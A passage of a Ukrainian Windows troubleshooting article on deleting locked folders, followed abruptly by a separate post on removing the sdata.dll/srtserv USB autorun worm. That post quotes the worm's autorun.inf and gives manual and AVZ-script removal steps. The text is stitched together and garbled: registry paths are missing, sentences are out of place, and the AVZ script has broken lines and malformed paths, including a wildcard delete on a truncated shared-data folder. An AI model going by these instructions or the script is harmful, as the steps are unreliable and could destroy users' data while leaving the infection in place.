І ось що видає система, якщо натиснути на Delete на клавіатурі.

По-перше, програму запущено, тому можливість видалення заблокована системою. По-друге, вона «висить» у диспетчері завдань, а саме у процесах.

Потрібно закрити програму і про всяк випадок «вбити» процес, щоб повідомлення не відобразилося знову.

Виходимо зі Skype, після чого тиснемо Ctrl+Alt+Delete (диспетчер завдань) та виділяємо програму. Після цього тиснемо на кнопку "завершити процес".

Відобразиться вікно з підтвердженням намірів. Тиснемо повторно на завершення. Тепер ви знаєте, як видалити папку, яка не видаляється на windows 8, та інші версії ОС.

Зверніть увагу!Описана процедура однаково корисна для всіх подібних випадків, не тільки для Skype.

Віруси

У деяких випадках видалення директорії неможливе з тієї елементарної причини, що ПК проникло потенційно небажане ПЗ, тобто. віруси. Крім інтернету, вони можуть потрапити на комп'ютер через флеш-накопичувач.

А як видалити папку, яка не видаляється з флешки? Правильно шляхом попередньої перевірки антивірусом.

Відкриваємо антивірус та скануємо накопичувач. Потім пробуємо видалити папку. Якщо не вийшло, доведеться форматувати флешку.

Зверніть увагу!Пам'ятайте, що після форматування видаляються всі дані, папки та файли, що зберігаються на флеш-пам'яті.

Процедура наступна. Тиснемо правою кнопкою на накопичувач і вибираємо «форматувати».

Перед нами меню з налаштуваннями.

1. Ємність флешки;
2. Файлова система;
3. Мітка тома (ім'я накопичувача);
4. Спосіб форматування;
5. Запуск процесу.

Основна увага на файлову систему. FAT 32 має бути вибрано за замовчуванням. Так вміст накопичувача зможе "прочитати" будь-який ПК. Ім'я можна дати будь-яке, оскільки воно не впливає на жодний параметр.

А ось для більш якісного форматування галочку. швидкого очищення» краще зняти. Тиснемо «почати» і чекаємо.

Налаштування папки

Цей прийом хороший для мережевих директорій. Іншими словами, кілька ПК об'єднані в єдину мережу. Адміністратор створює одну чи кілька спільних папок, куди можна скидати різноманітну інформацію. Щоб її ненароком ніхто не видалив, встановлює права доступу.

Робиться це так. Спочатку відкриваємо властивості папки правою кнопкою.

Переходимо в розділ "безпека" і тиснемо "додатково".

Вибираємо групу чи користувача, якому «ріжемо права».

Знову вибираємо групу, і тепер налаштовуємо рівень доступу.

Якщо ви встановите галочки на двох пунктах, пов'язаних з видаленням, користувач мережі не зможе прибрати ні папку, ні її вміст.

Після цього можна легко позбутися програми, оскільки ми його «вбили».

У такий спосіб можна почистити систему від інших програм, додатків і папок.

Сказати, що цей спосіб розрахований на лінивих – не можна. У будь-якому випадку від вас знадобиться знання місця, в якому зберігається папка. З іншого боку, всі програми спочатку встановлюються до папки Programm Files.

Як видалити папку, яка не видаляється з робочого столу та інших місць на ПК? Наслідуючи наші поради, ви зможете з легкістю позбутися різного софту, який зберігається в директоріях. Останні, у свою чергу, можна легко та невимушено ліквідувати.

Важливо!Система ніколи не буде "лаятись", якщо перелік файлів, що знаходяться в папці, в даний момент часу ніде не задіяні. Будь то набір фотографій, фільмів чи музики. Якщо ж ви не використовуєте файл, але з якихось незрозумілих причин вам не вдається почистити комп'ютер, значить вміст каталогу заражений вірусом. Про всяк випадок проскануйте систему на предмет небажаного ПЗ і будьте уважні, коли качаєте щось з інтернету.

В інших випадках винна банальна недбалість і небажання прочитати повідомлення діалогового вікна, у якому чітко пояснюється причина неможливості видалення папки.

При попаданні вірусу в комп'ютер вірус має властивість прописуватися в автозавантаження, а далі в реєстр. Для малодосвідчених користувачів ці слова мало про що говорять. Вірус – це програмне забезпечення, яке завдає шкоди комп'ютеру, так само це можуть бути скрипти або заражені архіви та pdf файли. У момент влучення вірус починає самопоширюватися, при цьому ризику зараження в основному піддаються exe і bat файли, а також архіви zipта rar.

На що варто звернути увагу, якщо ви підозрюєте або просканували комп'ютер антивірусними утилітами, але проблема залишилася, перш за все, дивимося автозавантаження. Для цього потрібно ввести наступні команди до командного рядка:
1. Відкриваємо: Пуск далі тиснемо виконати або в рядку пошуку "msconfig.exe"

Відкривається вікно: "Конфігурація системи", натискаємо на вкладку "Автозавантаження", і дивимося, що у нас там стоїть в автозапуску. Насамперед звертаємо увагу на назви програм, а також на назву файлу та шляхи його знаходження. Зазвичай вірусами є файли з назвами, що не читаються, або файли назви яких складаються з цифр допустимо «004284.exe» «73294.exe».

2. Знімаємо галочки з цих видів програм, тиснемо кнопку «Застосувати», далі «Ок».

Наступна дія - це редагування реєстру. Чому і навіщо це потрібно зробити. При налаштуванні автозавантаження, через конфігурацію системи, не завжди з автозавантаження забирається те, що нам не потрібно.

1. Відкриваємо меню "Пуск", шукаємо рядок пошуку або вкладка "Виконати", вводимо команду "regedit". Відкривається вікно редактора реєстру.

2. Насамперед перевіряємо гілку:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

Шукаємо у списку запис "Shell" (XP) У Windows7 цього розділу немає. Дивимося: значення параметра, за замовчуванням, має бути «Explorer.exe», якщо є ще щось видаляємо.

Усім добрий час доби! Сьогодні хотів би поговорити про вірус, який поширюється через Інтернет, локальну мережу, flash-Носії. Цей вірусмає характеристики руткіта, трояна, мережевого черв'яка. Визначається цей вірус як:
— Trojan.Siggen2.28594у drWEB Antivirus.
— W32/Dx.VUM!trу Fortinet Antivirus.
— Worm.Win32.AutoRun.hdfу Kaspersky Lab.
Цей вірус був розроблений російськими програмістами і призначений для 32-бітної платформи ОС Windowsз процесором x86(файл типу - Portable Executable,PE).
Цей вірус містить у собі кілька основних файлів.

Як зробити видимими приховані вірусом файли та папки дивіться у статті =>><<=

. mdhevw.exe(необов'язковий, може бути будь-який *.exe файл) атрибути даного файлу:

—Прихований,

—Системний,

—Тільки читання.

Виробляє імпорт системної бібліотеки kernel32.dll (LoadLibraryA, GetProcAddress);

. sdata.dll(в основному постійний файл за будь-яких модифікацій). Упакований UPX. Атрибути даного файлу:

-Прихований,

-Системний,

-Тільки читання.

Здійснює імпорт системних бібліотек: KERNEL32.DLL(LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree),

advapi32.dll(RegCloseKey), ntdll.dll (ZwOpenProcess), oleaut32.dll (SysFreeString), user32.dll(CharNextA);

. aUtoRuN.iNF(обов'язковий файл є основним для поширення). Атрибути даного файлу:

—Прихований,

—Тільки читання.

Вміст файлу aUtoRuN.iNF:

Open=mdhevw.exe -flash

UseAutoPlay=1

Action=Відкрити папку для перегляду файлів

shell\open\Command=mdhevw.exe -flash

shell\open\Default=1

shell\explore\Command=mdhevw.exe -flash

де шукати?

- вірусвпроваджується в ( Windows XP) або \Users\All Users\ (Windows Vistaі Windows 7) створює каталог;

У створюються файли mdhevw.exeі sdata.dll;

- mdhevw.exeі aUtoRuN.iNFкопіюються в кореневі директорії всіх локальних та знімних дисків;

-mdhevw.exeі aUtoRuN.iNFтакож копіюються в корінь знову підключених знімних дисків.

Також у реєстрі даний вірусстворює собі ґрунт для подальших дій.

створюється параметр зі значенням

(у Windows Vistaі Windows 7 - );

Так само вірусблокує завантаження ОСWindowsв Безпечний режим,видаляючи відповідні ключі Реєстру;

- вірустакож перешкоджає відключенню знімних дисків (за допомогою значка Безпечне видалення пристрою);

Взагалі дуже не добрий вірусі дуже набридливий і постійно нагадує себе під час підключення змінних носіїв. У вузі в якому я працюю на момент написання цієї статті він скрізь, тому що панове студенти є "різнощиками" цієї зарази ... Але зараз не про це.

За допомогою чого визначити вірусsdata. dll/ ?

AutoRunsзнаходить наявність підозрілого файлу в автозавантаженні.

Як видалити вірус sdata.dll? якщо антивірус не справляється.

Для видалення вірусу sdata/srtserv з ОС є багато шляхів. Ми розглянемо кілька способів.

Спосіб номер разів:видалення вірусу sdata/вручну.

1) Для того що б видалити вірус вручнунам знадобиться утиліта AutoRuns. Вона нам докладно показує, що і звідки запускається. Знаходимо шкідливий процес і видаляємо його.

C:\Documents and Settings\All Users\Application Data\srtserv\

В Windows Vistaі Windows 7:

C:\ Users\ AllUsers\ \

Або можна зробити перезавантаження операційної системи і завантажитися вже без цього процесу, оскільки ми його видалили з автозавантаження.

Важливо! У кореневих директоріях всіх локальних дисків та змінних носіїв необхідно видалити файли mdhevw.exeі aUtoRuN.iNF.

Ну і наостанок перевірити антивірусною програмою з оновленими базами ваш комп'ютер на наявність вірусівдля того щоб переконатися, чи всі видалили.

Спосіб номер два: видалення вірусу sdata/за допомогоюLiveCD(Завантажувальний диск).

На даний час безліч Live CD типу Windows miniPEабо ERD Commander;

Я наведу приклад із диском ERD Commander.

Вставляємо диск з ERD Commanderв CD-ROM таперезавантажуємо Комп'ютер;

Під час завантаження заходимо до BIOS(Клавіша del, F2, Esc);

Встановіть завантаження з CD/DVD приводу та зберігаємося;

У вікні Welcome to ERD Commanderвибираємо Операційну систему та натискаємо OK;

Після завантаження Робочого столу, заходимо в My Computer;

В каталозі

\Documents and Settings\All Users\Application Data\ (Windows XP)

\Users\All Users\ (Windows Vistaі Windows 7)

видаляємо каталог (разом із файлами mdhevw. exeі sdata. dll);

У кореневих директоріях всіх локальних дисків також видаляємо файли mdhevw.exeі aUtoRuN.iNF;

Натискаємо Start - Administrative Tools - RegEdit;

Переходимо у гілку реєстру

;

Тепер потрібно видалити параметр зі значенням

C:\Documents and Settings\All Users\Application Data\srtserv\mdhevw.exe

в Windows Vistaі Windows 7

C:\Users\All Users\srtserv\mdhevw.exe

;

Необхідно перевірити значення параметра Shell(значення має бути Explorer.exe);

Також перевіряємо значення параметра Userinit (повинно бути C:\Windows\system32\userinit.exe);

Перезавантажуємо комп'ютер.

Завантажуємо Windowsу звичайному режимі;

Якщо після перезавантаження з'явиться повідомлення, що профіль користувача не знайдено, Виконуємо наступне:

Пуск -> Виконати… ->у полі Відкритивведіть regedit -> OK;

Розкриваємо гілку реєстру

;

Видаляємо параметр зі значенням

C:\Documents and Settings\All Users\Application Data\srtserv\mdhevw.exe

в Windows Vistaі Windows 7

C:\Users\All Users\srtserv\mdhevw.exe

Закрийте Редактор реєстру;

Переходимо:

Пуск -> Виконати… ->вводимо regsvr32/i shell32.dll -> OK;

З'явиться вікно RegSvr32з повідомленням "DllRegisterServer and DllInstall в shell32.dll завершено успішно", натисніть OK;

Для того, щоб система повторно не самозаразилася відключаємо відновлення системи (або вручну очищаємо папку System Volume Information);

Чистимо кеш інтернет-файлів;

Перезавантажуємось;

Тепер проскануємо систему антивірусом зі свіжими основами.

Спосіб номер три: видалення вірусу sdata/за допомогою утилітиAVZ.

Більш зручний, тому що все відбувається автоматично.

Для даного методунам знадобиться утиліта AVZ.

І так завантажуємо AVZ, розпаковуємо, запускаємо від імені адміністратора файл avz.exe.

І вставляємо скрипт наведений нижче:

_________________________

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile("C:\Documents and Settings\All Users\Application Data\srtserv\slmvsrv.exe","");
QuarantineFile("C:\Documents and Settings\All Users\Application Data\msuwarn\slgssrv.exe","");
QuarantineFile("C:\Documents and Settings\All Users\Application Data\srtserv\sdata.dll","");
TerminateProcessByName("c:\documents and settings\all users\application data\srtserv\slmvsrv.exe");
slmvsrv.exe");
DeleteFile("C:\Documents and Settings\All Users\Application Data\srtserv\ sdata.dll");
DeleteFile("C:\Documents and Settings\All Users\Application Data\msuwarn\ slgssrv.exe");
msuwarn");
DeleteFile("C:\Documents and Settings\All Users\Application Data\srtserv\ slmvsrv.exe");
RegKeyParamDel("HKEY_LOCAL_MACHINE","Software\Microsoft\Windows\CurrentVersion\Run","");
DeleteFile("C:WINDOWSsystem32cmdow.exe");
DeleteFileMask("C:\Documents and Settings\All Users\Application Data\ msuwarn", "*. *", true);
DeleteDirectory("C:\Documents and Settings\All Users\Application Data\ msuwarn");
DeleteFileMask(":\Documents and Settings\All Users\Application Data\", "*.*", true);
DeleteDirectory(":\Documents and Settings\All Users\Application Data\");
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
ExecuteRepair(8);
RebootWindows(true);
end.

_________________________

Примітка: Імена файлів виділені жирним шрифтом в даному скрипті можуть відрізнятися, оскільки вірус постійно модифікується, тому будьте уважні і, щоб уникнути помилок, коректно вказуйте імена файлів, які в свою чергу знаходяться в каталозі.

Ось кілька методів для того, щоб зробити цей світ чистішим!

Що ж на цьому слід кінчати. Думаю, дана стаття виявиться корисною і допоможе багатьом людям.

Так само прошу залишити коментар за цією статтею як вона допомогла вам або якісь уточнення. Буду радий допомогти!

Видаляємо вірус, який приховує папки і поширюється на флешках